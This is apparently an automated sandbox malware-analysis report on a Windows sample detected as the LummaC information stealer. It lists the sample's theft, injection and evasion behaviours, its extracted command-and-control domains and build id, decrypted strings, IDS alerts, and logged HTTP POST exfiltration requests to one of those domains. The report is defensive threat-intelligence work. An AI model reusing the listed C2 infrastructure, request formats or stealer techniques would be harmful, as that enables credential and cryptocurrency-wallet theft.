Edit tour

Windows Analysis Report
gFCeeWNTvZ.exe

Overview

General Information

Sample name:	gFCeeWNTvZ.exe renamed because original name is a hash value
Original sample name:	49659ec0caa7c396e5770349ce157f4ac4d2e364d1694c8588a4b9a5e905db2d.exe
Analysis ID:	1553058
MD5:	f04f7352cba3579ff18e50534f6a14d4
SHA1:	e5269c148e62f81a41cdc7144964046fdbd8fc4c
SHA256:	49659ec0caa7c396e5770349ce157f4ac4d2e364d1694c8588a4b9a5e905db2d
Tags:	exenotion-ramchhaya-comuser-JAMESWT_MHT
Infos:

Detection

LummaC, MicroClip

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected MicroClip

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to get notified if a device is plugged in / out

Contains functionality to modify clipboard data

Contains functionality to read the clipboard data

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Installs a global mouse hook

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

gFCeeWNTvZ.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\gFCeeWNTvZ.exe" MD5: F04F7352CBA3579FF18E50534F6A14D4)

BitLockerToGo.exe (PID: 7812 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rottieud.sbs", "thinkyyokej.sbs", "repostebhu.sbs", "ducksringjk.sbs", "tamedgeesy.sbs", "brownieyuz.sbs", "explainvees.sbs", "relalingj.sbs"], "Build id": "eSaxAu--webex"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1891820407.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: gFCeeWNTvZ.exe PID: 7564	JoeSecurity_MicroClip	Yara detected MicroClip	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 7812	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 7812	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 7812	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 5 entries

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T09:27:19.114331+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.4	49730	TCP
2024-11-10T09:27:59.304154+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.4	62527	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T09:27:20.119008+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.73.211	443	TCP
2024-11-10T09:27:21.493404+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	104.21.73.211	443	TCP
2024-11-10T09:27:22.855660+0100	2028371	3	Unknown Traffic	192.168.2.4	62520	104.21.73.211	443	TCP
2024-11-10T09:27:24.216426+0100	2028371	3	Unknown Traffic	192.168.2.4	62521	104.21.73.211	443	TCP
2024-11-10T09:27:25.592113+0100	2028371	3	Unknown Traffic	192.168.2.4	62522	104.21.73.211	443	TCP
2024-11-10T09:27:27.143991+0100	2028371	3	Unknown Traffic	192.168.2.4	62523	104.21.73.211	443	TCP
2024-11-10T09:27:28.980255+0100	2028371	3	Unknown Traffic	192.168.2.4	62524	104.21.73.211	443	TCP
2024-11-10T09:27:31.429815+0100	2028371	3	Unknown Traffic	192.168.2.4	62525	104.21.73.211	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T09:27:20.798754+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49734	104.21.73.211	443	TCP
2024-11-10T09:27:21.995787+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49736	104.21.73.211	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T09:27:20.798754+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49734	104.21.73.211	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T09:27:21.995787+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49736	104.21.73.211	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-10T09:27:27.877172+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	62523	104.21.73.211	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://rottieud.sbs/apix	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/apiDUv	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/api	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/apid1	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/ckz	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/apipf	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/g	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/&	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/apiaHD	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/h	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs:443/apitPd	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/apies	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/1	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/-	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/apili	Avira URL Cloud: Label: malware
Source: https://rottieud.sbs/z	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.gFCeeWNTvZ.exe.12b4a000.3.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["rottieud.sbs", "thinkyyokej.sbs", "repostebhu.sbs", "ducksringjk.sbs", "tamedgeesy.sbs", "brownieyuz.sbs", "explainvees.sbs", "relalingj.sbs"], "Build id": "eSaxAu--webex"}

Multi AV Scanner detection for domain / URL

Source: https://rottieud.sbs/api

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for submitted file

Source: gFCeeWNTvZ.exe

Virustotal: Detection: 11%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: tamedgeesy.sbs
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: relalingj.sbs
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: rottieud.sbs
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: brownieyuz.sbs
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: explainvees.sbs
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: ducksringjk.sbs
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: thinkyyokej.sbs
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: repostebhu.sbs
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: rottieud.sbs
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.1984652946.000000000055D000.00000002.00000400.00020000.00000000.sdmp	String decryptor: eSaxAu--webex

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_0053453C CryptUnprotectData,

2_2_0053453C

Source: gFCeeWNTvZ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62520 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62521 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62522 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62523 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62524 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.211:443 -> 192.168.2.4:62525 version: TLS 1.2

Source: gFCeeWNTvZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\gFCeeWNTvZ.exe

Code function: 0_2_64608848 SystemParametersInfoW,KiUserCallbackDispatcher,SystemParametersInfoW,LoadLibraryA,SystemParametersInfoW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDpiAwarenessContext,SetProcessDPIAware,GetModuleHandleW,CreateWindowExW,ShowWindow,RegisterDeviceNotificationW,PeekMessageW,TranslateMessage,DispatchMessageW,

0_2_64608848

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [eax], bl	2_2_0052D100
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	2_2_0053B390
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-456340F9h]	2_2_005553B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	2_2_00545423
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	2_2_00545423
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+000000C6h]	2_2_0052D768
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-000000DDh]	2_2_00552880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, ebx	2_2_00558B37
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], A489A0F1h	2_2_00558B37
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+134B584Bh]	2_2_0055CCE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-1AB836FBh]	2_2_0052CD3E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax-4Ch]	2_2_00536F52
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push edi	2_2_00543013
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-456340F5h]	2_2_00556090
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-456340F5h]	2_2_00556090
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_005441E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push eax	2_2_005581BF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push ebx	2_2_0053524F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	2_2_00559270
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp esi	2_2_0053D231
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx-01h]	2_2_00539290
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+7BDB4716h]	2_2_00542350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+04h]	2_2_00542350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	2_2_0053F337
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+66A5633Eh]	2_2_0055A320
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000E2h]	2_2_0055A320
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [edi], cl	2_2_005473D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	2_2_0052E3C4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, ecx	2_2_0052B3A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dh, byte ptr [edi+ecx]	2_2_00537437
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-4F06D217h]	2_2_00537437
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add edx, ebp	2_2_005294F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	2_2_0052E482
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	2_2_0053C480
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	2_2_0053B4B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then push 00000000h	2_2_0052C577
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	2_2_005335E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov byte ptr [eax], cl	2_2_00538670
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp al, 5Ch	2_2_00522660
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+743244FFh]	2_2_0053C6E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h	2_2_0053F710
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, edi	2_2_00529720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then inc ebx	2_2_0055B722
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [edx+ecx]	2_2_005347D1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h	2_2_0053F7D8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx]	2_2_00559830
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, ebx	2_2_00543886
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	2_2_00533960
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx-15AA694Ah]	2_2_0052B98C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_00542A70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	2_2_00559A30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [edx], cx	2_2_00533ABF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+537D72CBh]	2_2_00557B08
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	2_2_00534BD2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, ecx	2_2_0053DC5A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_0054FC10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, word ptr [ebp+eax+02h]	2_2_00553C0F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then cmp al, 2Eh	2_2_00540C99
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000268h]	2_2_0052CCBB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00543CA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov word ptr [ebp+edx*4+00h], ax	2_2_00527D70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]	2_2_00527D70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov edx, eax	2_2_00542D77
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	2_2_00545DD8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	2_2_00545DD8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	2_2_0052BE63
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movsx edi, byte ptr [ebx]	2_2_00559E30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp ecx	2_2_0052BE81
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov ecx, eax	2_2_00545423
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	2_2_00545423
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then jmp eax	2_2_00536F47
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	2_2_00521F10

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49734 -> 104.21.73.211:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49736 -> 104.21.73.211:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49734 -> 104.21.73.211:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.73.211:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:62523 -> 104.21.73.211:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: rottieud.sbs
Source: Malware configuration extractor	URLs: thinkyyokej.sbs
Source: Malware configuration extractor	URLs: repostebhu.sbs
Source: Malware configuration extractor	URLs: ducksringjk.sbs
Source: Malware configuration extractor	URLs: tamedgeesy.sbs
Source: Malware configuration extractor	URLs: brownieyuz.sbs
Source: Malware configuration extractor	URLs: explainvees.sbs
Source: Malware configuration extractor	URLs: relalingj.sbs

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:62525 -> 104.21.73.211:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:62520 -> 104.21.73.211:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:62521 -> 104.21.73.211:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.73.211:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:62522 -> 104.21.73.211:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:62523 -> 104.21.73.211:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.73.211:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:62524 -> 104.21.73.211:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:62527

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rottieud.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: rottieud.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7VW3YXLZA66F9EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18139Host: rottieud.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MZVX4FV38R3YLXIAE5QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8790Host: rottieud.sbs
